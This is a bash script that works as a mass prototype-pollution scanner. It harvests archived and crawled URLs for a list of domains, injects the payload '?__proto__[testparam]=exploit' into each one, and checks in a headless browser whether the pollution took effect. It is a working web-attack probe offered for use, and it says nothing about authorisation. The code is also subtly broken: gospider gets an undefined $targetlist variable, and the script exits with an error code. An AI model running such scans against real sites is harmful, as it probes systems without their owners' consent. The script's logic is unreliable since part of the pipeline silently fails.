A Prototype pollution vulnerability scanner

protpscan.sh

#!/bin/bash
targets=$1
mkdir -p protpscan
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
cd protpscan 2> /dev/null
echo -e "Total $(cat $targets | wc -l) domains loaded to scan"
echo -e "Increasing scope..."
xargs -a $targets -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt
cat $targets | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt &> /dev/null
gospider -S $targetlist -d 10 -c 20 -t 50 -K 3 --no-redirect --js -a -w --blacklist ".(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt)" --include-subs -q -o gospider 2> /dev/null | anew -q gospider.txt && rm -rf gospider/ &> /dev/null
cat *.txt | sed '/\?\|%\|=/d' | sed "s/(\|'\|)//g" | sed '$s/\/$//' | anew -q incscope.txt
echo -e "Starting scan..."
sed 's/$/\?__proto__[testparam]=exploit/' $targets | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULN]"' 2> /dev/null | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" | anew protoresults.txt | notify -silent &> /dev/null
sed 's/$/\?__proto__[testparam]=exploit/' incscope.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULN]"' 2> /dev/null | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" | anew protoresults.txt | notify -silent &> /dev/null
echo -e "Finished scan..."
echo -e "Finalising things"
rm -rf wayback.txt gauplus.txt gospider.txt
exit 1